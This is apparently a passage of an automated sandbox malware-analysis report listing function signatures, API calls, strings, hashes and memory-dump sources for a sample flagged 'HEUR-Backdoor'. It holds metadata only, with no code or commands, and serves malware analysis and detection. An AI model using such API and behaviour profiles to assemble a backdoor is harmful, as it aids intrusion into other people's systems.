                                                • Instruction ID: 1bec88c9942aa579630d6882cd9f310c9aede0c1e33abdbcfdbff2c7b6a3dab3
                                                • Opcode Fuzzy Hash: 5e9315baa85d90847f022335c31d18ea82e56d09d0b270c4753702f659ca135e
                                                • Instruction Fuzzy Hash: D1812071208248AFC654DF29CC44A2ABBE9FFC8715F00491DF98AD7260DB35AE05DB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: _swprintf
                                                • String ID: %ls$%s: %s
                                                • API String ID: 589789837-2259941744
                                                • Opcode ID: 5ef2ad8560be0723b25bf2323d0a46c44e55623607b68260ea25e01c315f84eb
                                                • Instruction ID: 27c60b832c909ddab9312cb029b68a1e7c0a32976070b26a72e591c6cd8a2085
                                                • Opcode Fuzzy Hash: 5ef2ad8560be0723b25bf2323d0a46c44e55623607b68260ea25e01c315f84eb
                                                • Instruction Fuzzy Hash: 1B51E83128E7C0F9EA312AEACC57F367665A70CB00F644917F39A744D1C6FE54E06692
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __EH_prolog.LIBCMT ref: 007D7730
                                                • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 007D78CC
                                                  • Part of subcall function 007DA444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,007DA27A,?,?,?,007DA113,?,00000001,00000000,?,?), ref: 007DA458
                                                  • Part of subcall function 007DA444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,007DA27A,?,?,?,007DA113,?,00000001,00000000,?,?), ref: 007DA489
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: File$Attributes$H_prologTime
                                                • String ID: :
                                                • API String ID: 1861295151-336475711
                                                • Opcode ID: cd48c86fdf9976e07282370f9dc9e920e2fc52cc798a23f4b82b30c1e4950c66
                                                • Instruction ID: 25e3b3b853d9d21fd6e75130e995bfc2a47c7cedc387fe8fc8c044cff43bf716
                                                • Opcode Fuzzy Hash: cd48c86fdf9976e07282370f9dc9e920e2fc52cc798a23f4b82b30c1e4950c66
                                                • Instruction Fuzzy Hash: 24415371905158EADB25EB50DD59EEEB37CAF45300F00409BB609A3292EB785F84DF61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: UNC$\\?\
                                                • API String ID: 0-253988292
                                                • Opcode ID: b50a36e1f5f6581af4a2597371cff9d0741a3731d3a8725c288b4f73bef64569
                                                • Instruction ID: 6c6f99f346f703fdf7c8e9f40919da4c6bcb9127db8002f4b5fd41e89b20a1ee
                                                • Opcode Fuzzy Hash: b50a36e1f5f6581af4a2597371cff9d0741a3731d3a8725c288b4f73bef64569
                                                • Instruction Fuzzy Hash: 4F41A135400259EBDB20AF61CC45EEB77BDEF84760B12406BF815A3352E778EA50CAA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Shell.Explorer$about:blank
                                                • API String ID: 0-874089819
                                                • Opcode ID: d0c8ea7c0d0e28130c67d15f8e812369c28e3aed3ede4095af69c3e5d87a7291
                                                • Instruction ID: 3d2d8594eff5a7a6f8427853cdf6f6e8b8942b0e0792f876e34609a68a554156
                                                • Opcode Fuzzy Hash: d0c8ea7c0d0e28130c67d15f8e812369c28e3aed3ede4095af69c3e5d87a7291
                                                • Instruction Fuzzy Hash: D921A572205345DFCB549F65CC95A2A77A8FF88311B14856DFA098F292DB78EC00CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 007DEB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 007DEB92
                                                  • Part of subcall function 007DEB73: GetProcAddress.KERNEL32(008181C0,CryptUnprotectMemory), ref: 007DEBA2
                                                • GetCurrentProcessId.KERNEL32(?,?,?,007DEBEC), ref: 007DEC84
                                                Strings
                                                • CryptUnprotectMemory failed, xrefs: 007DEC7C
                                                • CryptProtectMemory failed, xrefs: 007DEC3B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AddressProc$CurrentProcess
                                                • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                • API String ID: 2190909847-396321323
                                                • Opcode ID: 9f1a1e6695f717da19bc01021dc02d07d28ec8add46e732fe40a1f55aece1276
                                                • Instruction ID: e0143bd03af7856bf3f96db76aa259b392a3f3de220a9d76ab7f29d521531e1a
                                                • Opcode Fuzzy Hash: 9f1a1e6695f717da19bc01021dc02d07d28ec8add46e732fe40a1f55aece1276
                                                • Instruction Fuzzy Hash: FA110A32A15624ABDB166B24DD06AAE3728FF05721B048017FC099F391DB7D6E4187E4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateThread.KERNEL32(00000000,00010000,007E09D0,?,00000000,00000000), ref: 007E08AD
                                                • SetThreadPriority.KERNEL32(?,00000000), ref: 007E08F4
                                                  • Part of subcall function 007D6E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007D6EAF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: Thread$CreatePriority__vswprintf_c_l
                                                • String ID: CreateThread failed
                                                • API String ID: 2655393344-3849766595
                                                • Opcode ID: b7fed5055ab64b9014d8920a4da7cccca5de095cdd6da1ad7f1d4f76abfaf128
                                                • Instruction ID: be9c1d0a14c0ed6bd7903d9ebd1d6ea8d4b63278073c1ba1ad8be00055b0ca94
                                                • Opcode Fuzzy Hash: b7fed5055ab64b9014d8920a4da7cccca5de095cdd6da1ad7f1d4f76abfaf128
                                                • Instruction Fuzzy Hash: CF01D6B1345305AFD6206F55EC86BA673ACFF48711F10042EF686921C1CEF5B8C19AA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 007DDA98: _swprintf.LIBCMT ref: 007DDABE
                                                  • Part of subcall function 007DDA98: _strlen.LIBCMT ref: 007DDADF
                                                  • Part of subcall function 007DDA98: SetDlgItemTextW.USER32(?,0080E154,?), ref: 007DDB3F
                                                  • Part of subcall function 007DDA98: GetWindowRect.USER32(?,?), ref: 007DDB79
                                                  • Part of subcall function 007DDA98: GetClientRect.USER32(?,?), ref: 007DDB85
                                                • GetDlgItem.USER32(00000000,00003021), ref: 007D134F
                                                • SetWindowTextW.USER32(00000000,008035B4), ref: 007D1365
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                • String ID: 0
                                                • API String ID: 2622349952-4108050209
                                                • Opcode ID: f7858010ef4d6a0fa7820b26c8860a9752fb1abac92ccc2bad32ce6cb8fc1d06
                                                • Instruction ID: 97da93640dcc4d2dd17f6165a90a7dfc3b4026a34d4ee7f05f18d18964731e05
                                                • Opcode Fuzzy Hash: f7858010ef4d6a0fa7820b26c8860a9752fb1abac92ccc2bad32ce6cb8fc1d06
                                                • Instruction Fuzzy Hash: C0F0AF3010028CB6DF250F618D0DBED3BB8BF52305F488416FD89946A1C77CC995EB10
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • WaitForSingleObject.KERNEL32(?,000000FF,007E0A78,?), ref: 007E0854
                                                • GetLastError.KERNEL32(?), ref: 007E0860
                                                  • Part of subcall function 007D6E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007D6EAF
                                                Strings
                                                • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 007E0869
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                • API String ID: 1091760877-2248577382
                                                • Opcode ID: d80b4b8c3a53ffd3864ebe22ce309e01cd57d163375485c9818c1bc2b075ff33
                                                • Instruction ID: c71cf1d01ac5a7bbb871be8b9edbccba0f6c461cc308ff5d03a11a3772ff24b9
                                                • Opcode Fuzzy Hash: d80b4b8c3a53ffd3864ebe22ce309e01cd57d163375485c9818c1bc2b075ff33
                                                • Instruction Fuzzy Hash: 37D02E31A0942062CA002324AC0EEAF3A18BF42730F200316F239A92F0DF28098182E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,?,007DD32F,?), ref: 007DDA53
                                                • FindResourceW.KERNEL32(00000000,RTL,00000005,?,007DD32F,?), ref: 007DDA61
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: FindHandleModuleResource
                                                • String ID: RTL
                                                • API String ID: 3537982541-834975271
                                                • Opcode ID: 79c9758ddf42f24db54e5506591fa7f1c506862506c90f7a6eff26f98d876b64
                                                • Instruction ID: c1f4e0435430622599f4af3c3906aee36cbb8274329ce06c7d4ef36a487b60dc
                                                • Opcode Fuzzy Hash: 79c9758ddf42f24db54e5506591fa7f1c506862506c90f7a6eff26f98d876b64
                                                • Instruction Fuzzy Hash: 32C01231286B5076D77017716C0DB432E9C7F11B11F05044DB181DA2D0D5E9CD448650
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: CommandLine
                                                • String ID: 0&`
                                                • API String ID: 3253501508-1430707966
                                                • Opcode ID: 4721384d8f11d21d7efd30bec453f8a5c55758c40891eb6dc7b30608e4a33d9e
                                                • Instruction ID: a1a988386637ca1b1adbc4a3d3152cf1148c436df9786cdaacedb0237f5bb73b
                                                • Opcode Fuzzy Hash: 4721384d8f11d21d7efd30bec453f8a5c55758c40891eb6dc7b30608e4a33d9e
                                                • Instruction Fuzzy Hash: 7AB00278901641DFCF80DFF5BE1D1847BE4B7ACA523841A56E415D2720E7354145DF20
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 2
                                                • API String ID: 0-450215437
                                                • Opcode ID: bfd2022020dff10d72d63ff6577579c793a3fc1f279c76ee7826e3a9157fba82
                                                • Instruction ID: 8258b4307039a368cd8bd210121b20447030412f74136d68c0b8d88b8ae3058b
                                                • Opcode Fuzzy Hash: bfd2022020dff10d72d63ff6577579c793a3fc1f279c76ee7826e3a9157fba82
                                                • Instruction Fuzzy Hash: DC3284B0E1992D8FDBA4EB58C894BADB7B1FB68301F5101E9900DE3291DE746EC08F54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 73d68b19e56d74368119541082e64fe9621df3199a5f98279eda619e88bf7dad
                                                • Instruction ID: 3fb39e1b12237fc122f08eb9812075573b8479bd1d4a003a906fa22e70db8557
                                                • Opcode Fuzzy Hash: 73d68b19e56d74368119541082e64fe9621df3199a5f98279eda619e88bf7dad
                                                • Instruction Fuzzy Hash: 145221A284E7C15FD7138B749C765913FB0AF27214B0E4ADBC4C0CF4A3E2189A5AD762
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Z${
                                                • API String ID: 0-2824158054
                                                • Opcode ID: 19f83079a5d0a9581feccc3c35ab51dbed3ac6f8f07180bc7d502e4a1a444426
                                                • Instruction ID: b3398044a0b09493743ad6ed4a6528c85fb0f756b34f1df17bca1859121b94f0
                                                • Opcode Fuzzy Hash: 19f83079a5d0a9581feccc3c35ab51dbed3ac6f8f07180bc7d502e4a1a444426
                                                • Instruction Fuzzy Hash: 6B01D670D0926D8EEB74CF50C8547ED76B1BB48304F8102A9D04DA62A1CBB81A849F44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0P_H
                                                • API String ID: 0-4176970036
                                                • Opcode ID: 74ae7db3b5d336b26b8ffa0e67dcd0056d3035b76f21ef75ce4c468a24de1f5c
                                                • Instruction ID: 1ccbe49cda7976d56a376c7673f586a95806efab35e52f9f83a00f838404a3eb
                                                • Opcode Fuzzy Hash: 74ae7db3b5d336b26b8ffa0e67dcd0056d3035b76f21ef75ce4c468a24de1f5c
                                                • Instruction Fuzzy Hash: 3151FB70E0991D8FEBA8EB98C4657EDB7B5EF98300F514239D00EE7291DE746945CB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 6K_^
                                                • API String ID: 0-960177960
                                                • Opcode ID: f1ca1d82aa48b3f135542d295cf108e8638ec90d2ec727fbd160ff2351c11419
                                                • Instruction ID: 4d23e8a98a8bbb6a293b52b8486a66c9dcb0b1ea474615fa938b6f0124e8e1c6
                                                • Opcode Fuzzy Hash: f1ca1d82aa48b3f135542d295cf108e8638ec90d2ec727fbd160ff2351c11419
                                                • Instruction Fuzzy Hash: 1A419D31E0E65E8FEB68DBA8D8616FDB7B0EF55300F05017AD009E32D2CA786A45CB55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0P_H
                                                • API String ID: 0-4176970036
                                                • Opcode ID: 831da72a3102e24170e77715e901639aec645a41b320b85214e631665f73902d
                                                • Instruction ID: 37a9604e72b3ec3e175806863873c10ad44a51ff59a7c4305c0a55e2644d9e24
                                                • Opcode Fuzzy Hash: 831da72a3102e24170e77715e901639aec645a41b320b85214e631665f73902d
                                                • Instruction Fuzzy Hash: 44310C70E1991D8FEFA4EBA8C4A5AECB7B5FF98300F514239D00ED3292DE7469418B40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: %
                                                • API String ID: 0-2567322570
                                                • Opcode ID: c3a7cd491020ddeac977390d6b2da493b2fd489c2fee253d63467a68681cd1bc
                                                • Instruction ID: 6cf8aac722132567e8e1d5044a4d615f717e4c3795689a0841b546902eb0a740
                                                • Opcode Fuzzy Hash: c3a7cd491020ddeac977390d6b2da493b2fd489c2fee253d63467a68681cd1bc
                                                • Instruction Fuzzy Hash: CCF03074E0A12A8BD7399B54C5A07E87271AF99304F1081F9D00E57696CA796A81CF60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a9cb98226e317ee880b648b7fee443cb456fba11d34c37bd781eb98097eb85a8
                                                • Instruction ID: 533ad1eb8bad743df52882804ed9f0b757bfa35eda69cc2065e6f9b0becf55dd
                                                • Opcode Fuzzy Hash: a9cb98226e317ee880b648b7fee443cb456fba11d34c37bd781eb98097eb85a8
                                                • Instruction Fuzzy Hash: 73D15D71E19A5D8FEBA8DF58C8A5BACB7A1FF58304F4442B9D00DD72A2DE346940CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a2ca4ab63880170497c5c57b96bd10c0de59a7aa772365a9633183d61e95d74c
                                                • Instruction ID: 50e4ec855927bcb8a6db1dbd77f9574b28865abca818f5ba919cc839c4a4cd4f
                                                • Opcode Fuzzy Hash: a2ca4ab63880170497c5c57b96bd10c0de59a7aa772365a9633183d61e95d74c
                                                • Instruction Fuzzy Hash: DFB14E71A19A5D8FEBA8EF58C865BA8B7A1FF58304F4442B9D01DD72E6CE346940CB01
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
